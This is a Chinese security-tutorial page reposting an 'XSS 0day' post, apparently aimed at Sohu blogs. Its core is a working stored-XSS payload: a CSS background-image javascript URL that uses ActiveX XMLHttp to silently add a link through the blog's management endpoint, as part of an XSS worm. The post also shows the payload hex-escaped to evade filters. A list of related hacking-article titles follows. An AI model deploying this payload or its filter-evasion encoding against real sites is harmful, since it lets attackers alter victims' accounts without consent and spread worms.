XSS 0DAY代码

所属分类: 实用技巧 / 安全教程 阅读数: 735
收藏 0 赞 0 分享
文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.

其实很简单,就是两次转码.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">

ASCII转码参考 http://s0n9.blog.sohu.com/16002288.html

写成下面16进制转义字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div> 
更多精彩内容其他人还在看

MSSQL注入PUBLIC权限下的xp_dirtree再度利用方法

MSSQL注入PUBLIC权限下的xp_dirtree再度利用方法
收藏 0 赞 0 分享

提权总结整理贴

提权总结整理贴
收藏 0 赞 0 分享

PHP 5.2.3 tidy扩展本地溢出漏洞利用代码

PHP 5.2.3 tidy扩展本地溢出漏洞利用代码
收藏 0 赞 0 分享

一些小技巧与常见问题解决方法

一些小技巧与常见问题解决方法
收藏 0 赞 0 分享

PHP服务端SESSION管理工具提供下载

PHP服务端SESSION管理工具提供下载
收藏 0 赞 0 分享

历代木马程序隐身的技术分析第1/2页

历代木马程序隐身的技术分析
收藏 0 赞 0 分享

一个黑客所需的基本技能总结

一个黑客所需的基本技能总结
收藏 0 赞 0 分享

win2003下创建永远的隐藏帐户的图文教程

win2003下创建永远的隐藏帐户的图文教程
收藏 0 赞 0 分享

变态入侵之有史以来最酷的Windows后门sethc.exe

变态入侵之有史以来最酷的Windows后门sethc.exe
收藏 0 赞 0 分享

完全解剖安全帐号管理器(SAM)结构

完全解剖安全帐号管理器(SAM)结构
收藏 0 赞 0 分享
查看更多